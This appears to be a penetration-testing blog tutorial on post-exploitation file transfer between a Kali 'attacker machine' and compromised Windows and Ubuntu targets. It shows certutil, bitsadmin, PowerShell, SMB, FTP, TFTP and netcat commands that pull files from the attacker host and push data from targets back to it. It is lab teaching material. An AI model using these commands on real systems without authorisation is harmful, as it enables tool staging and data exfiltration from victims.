File
transfer is a crucial step in the post-exploitation scenario while performing
penetration testing or red teaming. There are various ways to do the file
transfer, here in this article we are going to show them one by one.
Table of Contents
·
Lab setup
·
File transfer using wget
·
File transfer using curl
·
File transfer using certutil
·
File transfer using bitsadmin
·
File transfer using PowerShell
·
File transfer using SMB server
·
File transfer using SCP
·
File transfer using TFTP
·
File transfer using FTP
·
Different methods to setup the
server for file transfer
·
File transfer using Netcat
·
Conclusion
Lab setup
Here we are
going to perform the file transfer assuming we have already compromised the
target machine and we have an initial shell access.
Attacker
Machine: Kali Linux (192.168.31.141)
Target
Machine 1: Windows 10 (192.168.31.219)
Target
Machine 2: Ubuntu
Inside the
attacker's machine, we will setup an updog
server. It is a replacement of the Python's SimpleHTTPServer. It is useful for scenarios where a lightweight,
quick-to-deploy HTTP server is needed.
To install
the server, we will execute the following command:
pip3
install updog
After the
installation is complete, we can run the server at port 80 using the following
command:
updog -p 80
File transfer using wget
To transfer
the file, we can use the wget
command. wget is a powerful command
to download files from the web. It should be noted that while doing file
transfer using wget in windows, we need to mention the -o (-OutFile) flag in order to save the file. If we do not mention
the flag then it will only return it as an object i.e.,
WebResponseObject.
The command for wget in windows is:
powershell
wget http://192.168.31.141/ignite.txt -o ignite.txt
dir
type
ignite.txt
File transfer using curl
Curl is a
powerful command-line tool, which can be used to transfer files using various
networking protocols. Following will be the command to transfer the file:
curl http://192.168.31.141/ignite.txt
-o ignite.txt
File transfer using certutil
certutil is a command-line utility included
with the Windows operating system, designed for managing certificates and
cryptographic elements. To transfer the file using certutil following command
can be used:
certutil
-urlcache -f http://192.168.31.141/ignite.txt ignite.txt
The -split option in certutil is used to
split large files into smaller segments to perform the file transfer.
certutil
-urlcache -split -f http://192.168.31.141/ignite.txt ignite.txt
File transfer using bitsadmin
Bitsadmin is a command-line utility for
handling Background Intelligent Transfer Service (BITS) tasks in Windows. It
facilitates different file transfer operations, including downloading and
uploading files. The command for file transfer is:
bitsadmin
/transfer job http://192.168.31.141/ignite.txt C:\Users\Public\ignite.txt
It can be
seen that the file is successfully transferred after the command is executed.
File transfer using PowerShell
File
transfer can be performed using PowerShell directly by running the following
command:
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.141/ignite.txt',
'ignite.txt')
File transfer using SMB server
SMB is a
protocol meant for communication to provide shared access to files, ports etc.
within a network. In order to enable it we will use the impacket-smbserver script inside kali linux to share the files.
Here we are giving the shared directory name as share, the significance of the share here is that it converts the
file's long path into a single share directory. Here we can give the full path
of directory or the pwd as argument
so that it takes the current directories path.
impacket-smbserver
share $(pwd) -smb2support
After the
setup is done, we can execute the following command in the Windows machine to
copy the files from the share folder.
copy \\192.168.31.141\share\ignite.txt
To copy the
file from Windows into our kali linux, we can use the following command:
copy
ignite.txt \\192.168.31.141\share\ignite.txt
In order to
transfer file from another linux machine like ubuntu, we can connect with the
share folder using the smbclient
tool and then after login, we can directly upload and download the file using
put and get commands respectively.
smbclient
-L 192.168.31.141
smbclient \\\\192.168.31.141\share
ls
get
ignite.txt
put
data.txt
File transfer using SCP
SCP (Secure Copy Protocol) is a
method for securely transferring files between a local system and a remote
server, or between two remote servers. It operates over the SSH (Secure Shell) protocol, which
ensures a secure connection over potentially insecure networks. It has the
advantage of cross-platform usage such that it is supported by both linux and
windows.
To copy the
file from Windows to kali, we will be using the following command:
scp
ignite.txt kali@192.168.31.141:/tmp
To transfer
the file from kali linux to the windows machine, we will use the following
command:
scp
ignite.txt raj@192.168.31.219:/C:/Temp
File transfer using TFTP
TFTP
(Trivial File Transfer Protocol) is a basic and minimalistic protocol for file
transfers over a network. It operates over the UDP rather than TCP, this choice
helps keep the protocol lightweight but means it does not provide the
reliability and error-checking that TCP offers. It works on UDP port 69.
To transfer
a file from kali linux to windows machine, we will be using the following
command inside the Metasploit
framework:
use
auxiliary/server/tftp
set srvhost
192.168.31.141
set
tftproot /root/raj
run
To download
the file, we will run the following command in windows machine:
tftp -i
192.168.31.219 GET ignite.txt
dir
File transfer using FTP
FTP (File
Transfer Protocol) is a longstanding and widely utilized protocol for
transferring files across a network. It enables users to upload, download, and
manage files on a remote server. To enable the FTP service, we are going to use
the Metasploit framework. It can be noted that here we are keeping an
authentication on the service rather than keeping the anonymous login.
Following
will be the commands:
use
auxiliary/server/ftp
set srvhost
192.168.31.141
set ftproot
/root/raj
set ftpuser
raj
set ftppass
123
run
Once the
server is started, the file can be downloaded after authenticating into the FTP
server.
ftp
192.168.31.141
dir
get
ignite.txt
bye
dir
We can also
use the python FTP server using the pyftpdlib. It is a library of python which
helps us to setup the FTP server on the machine. Here we will be using it to
setup a FTP server on the kali machine.
First we
will start with the installation using pip3.
pip3
install pyftpdlib
After the
installation is complete, we can start the FTP server using the authentication
by the following command:
python3 -m
pyftpdlib -p 21 -u ignite -P 123
Once the
server is started we can authenticate into the FTP server from the windows
machine and download the file. To upload the file we will use the put command
and to download the file we will use the get command.
ftp
192.168.31.141
get
ignite.txt
put
C:\Users\raj\avni.txt
To setup
FTP server for Anonymous login, we will run the same command but without the
username and password.
python -m pyftpdlib
-p 21
Once the
server is enabled for Anonymous login, we can perform it and view the files.
ftp
192.168.31.141
ls
Different methods to setup the server for file transfer
To perform
the file transfer we need to setup a server, besides using updog.
To setup a
server using PHP, we can use the
following command:
php -S
0.0.0.0:8081
To setup a
server using python2, we can use the
following command:
python2 -m
SimpleHTTPServer 80
To setup a
server using python3, we can use the
following command:
python3 -m
http.server 8000
File transfer using Netcat
Netcat,
commonly known as nc, is a
multifunctional networking tool designed for reading from and writing to network
connections over TCP or UDP. Netcat can facilitate file transfers by
establishing a simple client-server setup.
To transfer
file in the kali machine from an Ubuntu machine we can use the following
command inside kali:
nc -lvp
5555 > file.txt
Now we can
run the following command in ubuntu to send the file to the kali machine:
ls
nc
192.168.31.141 5555 < file.txt
Similarly,
we can also receive files from a windows machine inside our kali linux.
However, it should be noted that we the target windows machine should have the
nc.exe binary to make this method work.
Following
is the command we need to run on the windows machine:
nc.exe
192.168.31.141 5555 < data.txt
To receive
the file in the kali machine, we will run the following command:
nc -lvp
5555 > data.txt
cat
data.txt
Conclusion
As we have
seen that there are various methods to transfer the file from out machine to
target system and vice versa. It depends on one's choice and circumstances to
use the appropriate tool for the file transfer.
0 comments:
Post a Comment